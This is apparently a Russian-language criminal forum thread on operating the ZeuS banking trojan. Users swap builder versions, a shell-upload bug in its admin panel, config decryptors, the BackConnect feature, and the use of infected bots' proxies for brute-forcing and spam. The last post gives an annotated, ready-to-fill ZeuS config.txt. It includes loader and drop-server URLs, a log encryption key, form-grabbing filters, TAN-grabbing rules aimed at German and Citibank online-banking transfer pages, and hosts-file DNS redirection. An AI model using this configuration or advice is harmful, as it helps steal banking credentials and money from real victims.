malware Zeus trojan.

[smartRYX]

имею в виду bot.exe, файл который загружается на удаленный комп, в readme ZeuS Multi Builder 1321 сказано:
PUBLIC VERSION SO:
- Big bot size (180kb uncompressed, 138kB UPX'd)

Big diffrence between this and original ZeuS:
- Original size is 110kb with this 180kb (138kB compressed)

 

[smartRYX]

Pernat1y, перезалей, пожалуйста, если имеешь чистые версии:
1.2.4.2 + админка от 1.2.5.1
и версию 1.1.1.0

 

[DarckSol]

вопрос такой... как перехватить только POST запросы из http трафика..?

 

[Dragon_X]

smartRYX
В той версии админики 1.2.5.1, что в паблике была, была возможность залить шел.
Чем не нравится 1.2.10.1? Там тот баг подправлен.

 

[smartRYX]

Dragon_X,
попробую 1.2.10.1
Когда инсталлируем панель управления и создаем MySQL DB, имеет значение какую MySQL кодировку использовать? ZeuS поддерживает utf8-general-ci?

 

[vldesign]

Доброго времени суток! Много часов гуглил, но так и не нашел ни одного дока по теме использования соксов у зевса. Я разобрался, как их собрать в лист и так далее. Но так и не понял как их использовать. И возможно ли их использовать всем листом (все сразу которые смогли открыть боты) скажем для брута, спама, инвайта ну и так далее. И если возможно то как?

 

[smartRYX]

одно уточнение по Zeus: там есть функция обычного кейлоггера (запись всех нажатий клавиш, в т.ч. offline), или только перехват HTTP/HTTPS запросов и формграббинг?

 

[Dragon_X]

только перехват HTTP/HTTPS запросов и формграббинг
кейлогера там нет

 

[smartRYX]

да, очень жаль.. Если бы была это простая функция, zeus был бы универсальным средством.

[mod][Ar3s] Ну а если бы им еще можно было гвозди забивать... Вот тогда!....
В него и так напихали чего только можно.[/mod]

 

[DarckSol]

Такс, кто то выкладывал когда то декриптор конфигов, если у кого нить завалялся выложите... желательно посвежее...

 

[GOONER]

Такс, кто то выкладывал когда то декриптор конфигов, если у кого нить завалялся выложите... желательно посвежее...

Спойлер: 3 у вас 43

Тут можно найти для ZeuS 2.0

 

[smartRYX]

[Ar3s]Ну а если бы им еще можно было гвозди забивать... Вот тогда!.... В него и так напихали чего только можно.

конечно же, бот продвинутый, я и не спорю. Добавить кейлоггер это будет пожелание.. По моему, каких-то кардинальных изменений для этого не потребуется. Offline-логи тоже нужная вещь. Кому не нужны, могли бы их отключить.

 

[Dragon_X]

И для второй версии

Спойлер: 3 у вас 43

http://blog.threatexpert.com/2010/05/config-decryptor-for-zeus-20.html
http://www.threatexpert.com/blog/zbot/zeusdecoder.zip

И для первой (тот же самый ) ):

Спойлер: 3 у вас 43

http://blog.threatexpert.com/2009/09/time-to-revisit-zeus-almighty.html
http://www.threatexpert.com/blog/zbot/ZeusDecoder.zip

не видел что уже ответили. удалите если что

 

[DarckSol]

Из всего предложенного для кряка моих конфигов ничего не подошло... очень жаль.... Если кто то может сделать инфой из конфига поделюсь, велком в ПМ или ICQ.
ЗЫ Версия бота не ниже 1,3,2,4...

 

[vanavanavanavana]

Люююдииии функция BackConnect u зевся c какой версии идет? и будет ли бот 1.3.1.1 коннектица к серваку BackConnecta из сборки фриЗевса.

плз ответьте - срочно нужно

 

[vldesign]

Если изначально в бота входит модуль BackConnect то будет...

 

[Pernat1y]

Люююдииии функция BackConnect u зевся c какой версии идет? и будет ли бот 1.3.1.1 коннектица к серваку BackConnecta из сборки фриЗевса.

вроде во всех 1.2.х.х была

 

[ammok]

Pernat1y
Во всех, да не во всех, даже в мауале написано что присутствует с версий 1.2.х.х но не во всех сборках... В общем, зависит от сборки.

 

[smartRYX]

какая версия админки в ZeuS 1.2.10.1+1.3.1.1? (тот, что с https://xss.pro/index.php?topic=16324.170 - в самом низу)
нигде в скриптах не нашел. Там, кстати, исправлены баги по sql иньекциям? В папке отсутствуют файлы config.txt и webinjects.txt, если есть у кого к этой версии, выложите плиз. У меня есть, но очень старые.

 

[DarckSol]

Создаём в папке с билдером файл [Config.txt] и вписываем туда вот это:

entry "StaticConfig"
  botnet "botnet_name";Указываем имя ботнета...
  timer_config 720 120; Интервал времени в секундах как часто стоит обновлять конфиг.... Певое значени по умолчанию, второе повторная попытка после неудачного коннекта
  timer_logs 30 10; Как часто отправлять накомпленые логи на стату...
  timer_stats 30 20; Как часто стучатся на стату... аналагично
  url_config "http://yandex.ru/cfg.bin"; Место нахождения конфига для бота
  url_compip "http://yandex.ru/ip.php" 64;Адрес где можно посматреть свой IP и скок байт надо скачать что бы его увидеть...
  encryption_key "emV1c19sb2dkYXRlX2VuY3JvcHRfa2V5";Ключ расшифровки логов.
;blacklist_languages 1049; Блокировка ненужных языков
end

entry "DynamicConfig"
  url_loader "http://yandex.ru/lsass.exe";Имя лоадера бота и его адерас на сервере
  url_server "http://yandex.ru/stat.php"; Адрес статы
  file_webinjects "webinjects.txt"; Название файла вебинжектов
	entry "AdvancedConfigs"
;"http://url1/cdffd.ccc"; Адрес резервного местонахождения конфига их может быть скок угодно
end
  entry "WebFilters";Тут указываем урлы которые мы юудем грабить, запрещать грабить или дедать скрины...
"http://yandex.ru/*";Будем грабить и записывать все логи совпадающие с этой маской...
"!http://yandex.ru/*";Запретить запись всех логов с этой маской...
"@http://yandex.ru/*";Делаем скрины и отправляем их на сервер при нажатии мышки.. скрин делается в области клтка мышки...
 entry "WebDataFilters"
  ;"http://mail.rambler.ru/*" "passw;login"
  end
  entry "WebFakes"
  ;"http://www.google.com" "http://www.yahoo.com" "GP" "" "";Подмена домена
  end
  entry "TANGrabber"
    "https://banking.*.de/cgi/ueberweisung.cgi/*" "S3R1C6G" "*&tid=*" "*&betrag=*"
    "https://internetbanking.gad.de/banking/*" "S3C6" "*" "*" "KktNrTanEnz"
    "https://www.citibank.de/*/jba/mp#/SubmitRecap.do" "S3C6R2" "SYNC_TOKEN=*" "*"
  end
 entry "DnsMap"
127.0.0.1 google.ru; Запись в файл host для подмены и запреда DNS
	end
end

Файл WebInject.txt может быть пустым...